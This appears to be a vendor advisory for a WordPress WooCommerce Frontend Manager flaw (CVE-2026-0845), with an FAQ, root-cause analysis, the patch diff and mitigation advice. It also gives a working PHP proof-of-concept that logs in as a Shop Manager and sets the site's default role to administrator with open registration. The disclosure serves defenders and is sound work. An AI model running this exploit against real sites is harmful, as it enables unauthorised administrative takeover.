What is CVE-2026-0845?

CVE-2026-0845 is a high-severity vulnerability in the WCFM – WooCommerce Frontend Manager plugin for WordPress, affecting versions up to 6.7.24. It allows authenticated users with Shop Manager-level access or higher to update arbitrary options in WordPress, potentially leading to privilege escalation.

How does this vulnerability work?

The vulnerability arises from a missing capability check in the WCFM_Settings_Controller::processing function. This allows attackers to send a specially crafted POST request to modify WordPress options without proper authorization, enabling them to change user roles and registration settings.

Who is affected by this vulnerability?

Any WordPress site using the WCFM – WooCommerce Frontend Manager plugin version 6.7.24 or earlier is at risk. Specifically, authenticated users with Shop Manager or higher privileges can exploit this vulnerability.

How can I check if my site is vulnerable?

Check the version of the WCFM – WooCommerce Frontend Manager plugin installed on your WordPress site. If it is version 6.7.24 or earlier, your site is vulnerable and should be updated.

How can I fix this vulnerability?

To mitigate the risk, update the WCFM – WooCommerce Frontend Manager plugin to version 6.7.25 or later, where the vulnerability has been patched. Regularly check for updates to ensure ongoing security.

What does the CVSS score of 7.2 indicate?

A CVSS score of 7.2 indicates a high level of severity, meaning that successful exploitation can lead to significant consequences, including complete site compromise. This score reflects the potential impact on the system’s confidentiality, integrity, and availability.

What are the practical risks associated with this vulnerability?

Exploitation of this vulnerability can allow attackers to change critical site settings, such as user roles and registration permissions. This could enable them to create administrative accounts, leading to full control over the WordPress installation.

What changes were made in the patch?

The patch for this vulnerability adds capability checks to ensure that only authorized users can access the settings controller. It also restricts the options that can be updated to a predefined list, preventing unauthorized modifications.

How does the proof of concept demonstrate the issue?

The proof of concept provided shows how an authenticated user can exploit the vulnerability by sending a crafted request to update the default user role to administrator. This illustrates the ease of exploitation and the potential for privilege escalation.

What should I do if I cannot update the plugin immediately?

If immediate updating is not possible, consider restricting access to the admin area for Shop Managers and above, or disabling the WCFM plugin until it can be updated. Regularly monitor user activity for any unauthorized changes.

Are there any additional resources for security best practices?

For more information on securing WordPress sites, refer to the WordPress Codex and security best practices guides. Regularly review security advisories and maintain a proactive approach to plugin management.

How can I stay informed about future vulnerabilities?

Subscribe to security mailing lists, follow WordPress security blogs, and regularly check the CVE database to stay updated on vulnerabilities affecting WordPress plugins and themes.

Atomic Edge Proof of Concept automated generator using AI diff analysis

Published : March 18, 2026

CVE-2026-0845: WCFM – WooCommerce Frontend Manager <= 6.7.24 – Authenticated (Shop Manager+) Arbitrary Options Update (wc-frontend-manager)

CVE ID CVE-2026-0845

Plugin wc-frontend-manager

Severity High (CVSS 7.2)

CWE 862

Vulnerable Version 6.7.24

Patched Version 6.7.25

Disclosed February 8, 2026

Analysis Overview

Atomic Edge analysis of CVE-2026-0845:
This vulnerability is an authenticated arbitrary options update flaw in the WCFM – WooCommerce Frontend Manager plugin for WordPress. The vulnerability affects the plugin’s settings processing controller, allowing attackers with Shop Manager or higher privileges to modify arbitrary WordPress site options. The CVSS score of 7.2 reflects the high impact of successful exploitation.

The root cause is a missing capability check in the WCFM_Settings_Controller::processing function. The vulnerable code path begins in wc-frontend-manager/core/class-wcfm-ajax.php at line 296, where the plugin processes AJAX requests for the ‘wcfm_settings_controller’ action. The code includes the settings controller file and instantiates the WCFM_Settings_Controller class without verifying the user has appropriate permissions. The controller’s processing method then executes update_option calls without validating the option keys being modified.

Exploitation requires an authenticated attacker with Shop Manager or higher privileges. The attacker sends a POST request to /wp-admin/admin-ajax.php with the action parameter set to ‘wcfm_settings_controller’. The request includes a wcfm_settings_form parameter containing an array with a wcfm_page_options sub-array. This sub-array contains key-value pairs where the keys are WordPress option names and the values are the desired settings. To escalate privileges, an attacker sets the default_role option to ‘administrator’ and the users_can_register option to ‘1’, enabling administrative user registration.

The patch addresses the vulnerability through multiple changes. In wc-frontend-manager/core/class-wcfm-ajax.php lines 296-304, the patch adds a capability check using current_user_can with the ‘access_wcfm_site_setup’ capability. The patch also restricts which option keys can be updated in wc-frontend-manager/controllers/settings/wcfm-controller-settings.php lines 150-156. The code now filters the wcfm_page_options array against an allowed list of keys using array_intersect_key and array_flip. Only keys present in the wcfm_allowed_page_keys array pass through to update_option calls.

Successful exploitation enables complete site compromise. Attackers can modify any WordPress option, including those controlling user registration, default user roles, authentication methods, and site configuration. The most direct attack path changes the default registration role to administrator and enables user registration, allowing attackers to create administrative accounts. This leads to full privilege escalation and administrative control over the WordPress installation.

Differential between vulnerable and patched code

Code Diff

--- a/wc-frontend-manager/controllers/messages/wcfm-controller-messages.php
+++ b/wc-frontend-manager/controllers/messages/wcfm-controller-messages.php
@@ -233,11 +233,26 @@
 				}

 				if( $message_status != 'unread' ) { $actions = ''; }
-				if( !wcfm_is_vendor() && ( $message_status == 'unread' ) && ( in_array( $wcfm_message->message_type, array( 'verification', 'vendor_approval', 'affiliate_approval' ) ) ) ) {
-
-				} else {
+
+				$resource_owner_id = $wcfm_message->author_id;
+				if($wcfm_message->message_to > 0) {
+					$resource_owner_id = $wcfm_message->message_to;
+				}
+				if($resource_owner_id < 0) $resource_owner_id = 0;
+
+				$is_allowed = wcfm_user_can_perform_request(
+					(int) $resource_owner_id,
+					'message_delete'
+				);
+				if( $is_allowed ) {
 					$actions .= '<a class="wcfm_messages_delete wcfm-action-icon" href="#" data-messageid="' . $wcfm_message->ID . '"><span class="wcfmfa fa-trash-alt text_tip" data-tip="' . esc_attr__( 'Delete', 'wc-frontend-manager' ) . '"></span></a>';
 				}
+
+				// if( !wcfm_is_vendor() && ( $message_status == 'unread' ) && ( in_array( $wcfm_message->message_type, array( 'verification', 'vendor_approval', 'affiliate_approval' ) ) ) ) {
+
+				// } else {
+				// 	$actions .= '<a class="wcfm_messages_delete wcfm-action-icon" href="#" data-messageid="' . $wcfm_message->ID . '"><span class="wcfmfa fa-trash-alt text_tip" data-tip="' . esc_attr__( 'Delete', 'wc-frontend-manager' ) . '"></span></a>';
+				// }

 				/*if( $wcfm_is_allow_pdf_invoice = apply_filters( 'wcfm_is_allow_pdf_invoice', true ) ) {
 					if( WCFM_Dependencies::wcfmu_plugin_active_check() && WCFM_Dependencies::wcfm_wc_pdf_invoices_packing_slips_plugin_active_check() ) {
--- a/wc-frontend-manager/controllers/settings/wcfm-controller-settings.php
+++ b/wc-frontend-manager/controllers/settings/wcfm-controller-settings.php
@@ -150,6 +150,8 @@
 		if( isset( $wcfm_settings_form['wcfm_page_options'] ) ) {
 			$wcfm_page_options = get_option("wcfm_page_options", array());
 			$wcfm_page_options = array_merge( $wcfm_page_options, $wcfm_settings_form['wcfm_page_options'] );
+			$wcfm_allowed_page_keys = apply_filters( 'wcfm_allowed_page_keys', array('wc_frontend_manager_page_id', 'wcfm_vendor_membership_page_id', 'wcfm_vendor_registration_page_id', 'wcfm_affiliate_registration_page_id') );
+			$wcfm_page_options = array_intersect_key( $wcfm_page_options, array_flip( $wcfm_allowed_page_keys ) );
 			foreach( $wcfm_page_options as $wcfm_page_option_key => $wcfm_page_option_val ) {
 				update_option( $wcfm_page_option_key, $wcfm_page_option_val );
 			}
--- a/wc-frontend-manager/core/class-wcfm-ajax.php
+++ b/wc-frontend-manager/core/class-wcfm-ajax.php
@@ -296,6 +296,10 @@
 						elseif( $WCFM->is_marketplace == 'dokan' ) new WCFM_Settings_Dokan_Controller();
 						elseif( $WCFM->is_marketplace == 'wcfmmarketplace' ) new WCFM_Settings_Marketplace_Controller();
 					} else {
+						if(!current_user_can( apply_filters( 'wcfm_setup_page_required_capability', 'access_wcfm_site_setup' ) ) && !( function_exists('wcfm_is_manager') && wcfm_is_manager() && function_exists('wcfm_is_group_manager') && ! wcfm_is_group_manager() )) {
+							wp_send_json_error( esc_html__( 'You don’t have permission to do this.', 'woocommerce' ) );
+							wp_die();
+						}
 						include_once( $this->controllers_path . 'settings/wcfm-controller-settings.php' );
 						new WCFM_Settings_Controller();
 					}
--- a/wc-frontend-manager/core/class-wcfm-notification.php
+++ b/wc-frontend-manager/core/class-wcfm-notification.php
@@ -1070,8 +1070,45 @@
   		wp_send_json_error( esc_html__( 'You don’t have permission to do this.', 'woocommerce' ) );
 			wp_die();
 		}
+
+	if( (!apply_filters( 'wcfm_is_pref_notification', true ) || !apply_filters( 'wcfm_is_allow_notifications', true ) ) && ( !apply_filters( 'wcfm_is_allow_direct_message', true ) || !apply_filters( 'wcfm_is_pref_direct_message', true ) ) ) {
+		wp_send_json_error( esc_html__( 'You don’t have permission to do this.', 'woocommerce' ) );
+		wp_die();
+	}

-  	$messageid = absint( $_POST['messageid'] );
+  	$messageid = isset( $_POST['messageid'] ) ? absint( $_POST['messageid'] ) : 0;
+
+	if ( !$messageid ) {
+		wp_send_json_error( esc_html__( 'You don’t have permission to do this.', 'woocommerce' ) );
+		wp_die();
+	}
+
+	$message_data = $wpdb->get_row( $wpdb->prepare(
+		"SELECT author_id, message_to, author_is_admin, author_is_vendor FROM {$wpdb->prefix}wcfm_messages WHERE ID = %d",
+		$messageid
+	) );
+
+	if ( !$message_data ) {
+		wp_send_json_error( esc_html__( 'You don’t have permission to do this.', 'woocommerce' ) );
+		wp_die();
+	}
+
+	$resource_owner_id = $message_data->author_id;
+	if($message_data->message_to > 0) {
+		$resource_owner_id = $message_data->message_to;
+	}
+	if($resource_owner_id < 0) $resource_owner_id = 0;
+
+	$is_allowed = wcfm_user_can_perform_request(
+		(int) $resource_owner_id,
+		'message_delete'
+	);
+
+	if ( ! $is_allowed ) {
+		wp_send_json_error( esc_html__( 'You don’t have permission to do this.', 'woocommerce' ) );
+		wp_die();
+	}
+
   	$wpdb->query( $wpdb->prepare( "DELETE FROM {$wpdb->prefix}wcfm_messages WHERE `ID` = %d", $messageid ) );
   	$wpdb->query( $wpdb->prepare( "DELETE FROM {$wpdb->prefix}wcfm_messages_modifier WHERE `message` = %d", $messageid ) );

--- a/wc-frontend-manager/helpers/wcfm-core-functions.php
+++ b/wc-frontend-manager/helpers/wcfm-core-functions.php
@@ -2391,4 +2391,33 @@
 	}
 	return $locale;
 });*/
-?>
 No newline at end of file
+if(!function_exists('wcfm_user_can_perform_request')) {
+	function wcfm_user_can_perform_request( $resource_vendor_id, $resource_type='', $resource_subtype='' ) {
+		$user_id = apply_filters('wcfm_current_vendor_id', get_current_user_id());
+		$has_capability = apply_filters( 'wcfm_current_user_can', true, $user_id, $resource_vendor_id, $resource_type, $resource_subtype );
+		if ( ! $has_capability ) {
+			return false;
+		}
+		if ( user_can( $user_id, 'administrator' ) ) {
+			return true;
+		}
+		if ( wcfm_is_vendor( $user_id ) && (int) $user_id === (int) $resource_vendor_id ) {
+			return true;
+		}
+		if ( function_exists('wcfm_is_manager') && wcfm_is_manager( $user_id ) ) {
+			if ( function_exists('wcfm_is_group_manager') && !wcfm_is_group_manager( $user_id ) ) {
+				return true;
+			}
+			if($resource_vendor_id) {
+				$group_list = array_filter((array) get_user_meta( $user_id, '_wcfm_vendor_group', true ));
+				foreach ( $group_list as $group_id ) {
+					$group_vendors = (array) get_post_meta( $group_id, '_group_vendors', true );
+					if ( in_array( $resource_vendor_id, $group_vendors ) ) {
+						return true;
+					}
+				}
+			}
+		}
+		return false;
+	}
+}
 No newline at end of file
--- a/wc-frontend-manager/wc_frontend_manager.php
+++ b/wc-frontend-manager/wc_frontend_manager.php
@@ -4,14 +4,14 @@
  * Plugin URI: https://wclovers.com
  * Description: WooCommerce is really Easy and Beautiful. We are here to make your life much more Easier and Peaceful.
  * Author: WC Lovers
- * Version: 6.7.24
+ * Version: 6.7.25
  * Author URI: https://wclovers.com
  *
  * Text Domain: wc-frontend-manager
  * Domain Path: /lang/
  *
  * WC requires at least: 3.0.0
- * WC tested up to: 10.4
+ * WC tested up to: 10.5
  *
  */

--- a/wc-frontend-manager/wc_frontend_manager_config.php
+++ b/wc-frontend-manager/wc_frontend_manager_config.php
@@ -4,7 +4,7 @@

 define('WCFM_TEXT_DOMAIN', 'wc-frontend-manager');

-define('WCFM_VERSION', '6.7.24');
+define('WCFM_VERSION', '6.7.25');

 define('WCFM_SERVER_URL', 'https://wclovers.com');

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC

// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2026-0845 - WCFM - WooCommerce Frontend Manager <= 6.7.24 - Authenticated (Shop Manager+) Arbitrary Options Update

<?php

$target_url = 'https://vulnerable-site.com/wp-admin/admin-ajax.php';
$username = 'shop_manager_user';
$password = 'shop_manager_password';

// Step 1: Authenticate to obtain WordPress cookies
$login_url = str_replace('/wp-admin/admin-ajax.php', '/wp-login.php', $target_url);
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $login_url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query([
    'log' => $username,
    'pwd' => $password,
    'wp-submit' => 'Log In',
    'redirect_to' => $target_url,
    'testcookie' => '1'
]));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_COOKIEJAR, 'cookies.txt');
curl_setopt($ch, CURLOPT_COOKIEFILE, 'cookies.txt');
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
$response = curl_exec($ch);

// Step 2: Exploit the vulnerability to enable admin registration
$exploit_payload = [
    'action' => 'wcfm_settings_controller',
    'wcfm_settings_form' => [
        'wcfm_page_options' => [
            'default_role' => 'administrator',          // Set default user role to administrator
            'users_can_register' => '1'                // Enable user registration
        ]
    ]
];

curl_setopt($ch, CURLOPT_URL, $target_url);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($exploit_payload));
$response = curl_exec($ch);

// Step 3: Verify the exploit succeeded by checking if registration is enabled
$options_check_url = str_replace('/wp-admin/admin-ajax.php', '/wp-admin/options-general.php', $target_url);
curl_setopt($ch, CURLOPT_URL, $options_check_url);
curl_setopt($ch, CURLOPT_POST, false);
$response = curl_exec($ch);

if (strpos($response, 'Membership: Anyone can register') !== false && 
    strpos($response, 'checked="checked"') !== false) {
    echo "Exploit successful: User registration enabled with admin default role.n";
    echo "Attackers can now register new accounts with administrative privileges.n";
} else {
    echo "Exploit may have failed. Check response.n";
}

curl_close($ch);

?>

Frequently Asked Questions

What is CVE-2026-0845?
Overview of the vulnerability
CVE-2026-0845 is a high-severity vulnerability in the WCFM – WooCommerce Frontend Manager plugin for WordPress, affecting versions up to 6.7.24. It allows authenticated users with Shop Manager-level access or higher to update arbitrary options in WordPress, potentially leading to privilege escalation.
How does this vulnerability work?
Mechanism of exploitation
The vulnerability arises from a missing capability check in the WCFM_Settings_Controller::processing function. This allows attackers to send a specially crafted POST request to modify WordPress options without proper authorization, enabling them to change user roles and registration settings.
Who is affected by this vulnerability?
Identifying vulnerable installations
Any WordPress site using the WCFM – WooCommerce Frontend Manager plugin version 6.7.24 or earlier is at risk. Specifically, authenticated users with Shop Manager or higher privileges can exploit this vulnerability.
How can I check if my site is vulnerable?
Verifying plugin version
Check the version of the WCFM – WooCommerce Frontend Manager plugin installed on your WordPress site. If it is version 6.7.24 or earlier, your site is vulnerable and should be updated.
How can I fix this vulnerability?
Updating the plugin
To mitigate the risk, update the WCFM – WooCommerce Frontend Manager plugin to version 6.7.25 or later, where the vulnerability has been patched. Regularly check for updates to ensure ongoing security.
What does the CVSS score of 7.2 indicate?
Understanding severity levels
A CVSS score of 7.2 indicates a high level of severity, meaning that successful exploitation can lead to significant consequences, including complete site compromise. This score reflects the potential impact on the system’s confidentiality, integrity, and availability.
What are the practical risks associated with this vulnerability?
Potential consequences of exploitation
Exploitation of this vulnerability can allow attackers to change critical site settings, such as user roles and registration permissions. This could enable them to create administrative accounts, leading to full control over the WordPress installation.
What changes were made in the patch?
Details of the fix
The patch for this vulnerability adds capability checks to ensure that only authorized users can access the settings controller. It also restricts the options that can be updated to a predefined list, preventing unauthorized modifications.
How does the proof of concept demonstrate the issue?
Exploit demonstration
The proof of concept provided shows how an authenticated user can exploit the vulnerability by sending a crafted request to update the default user role to administrator. This illustrates the ease of exploitation and the potential for privilege escalation.
What should I do if I cannot update the plugin immediately?
Temporary mitigation measures
If immediate updating is not possible, consider restricting access to the admin area for Shop Managers and above, or disabling the WCFM plugin until it can be updated. Regularly monitor user activity for any unauthorized changes.
Are there any additional resources for security best practices?
Further reading and guidance
For more information on securing WordPress sites, refer to the WordPress Codex and security best practices guides. Regularly review security advisories and maintain a proactive approach to plugin management.
How can I stay informed about future vulnerabilities?
Monitoring security updates
Subscribe to security mailing lists, follow WordPress security blogs, and regularly check the CVE database to stay updated on vulnerabilities affecting WordPress plugins and themes.

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations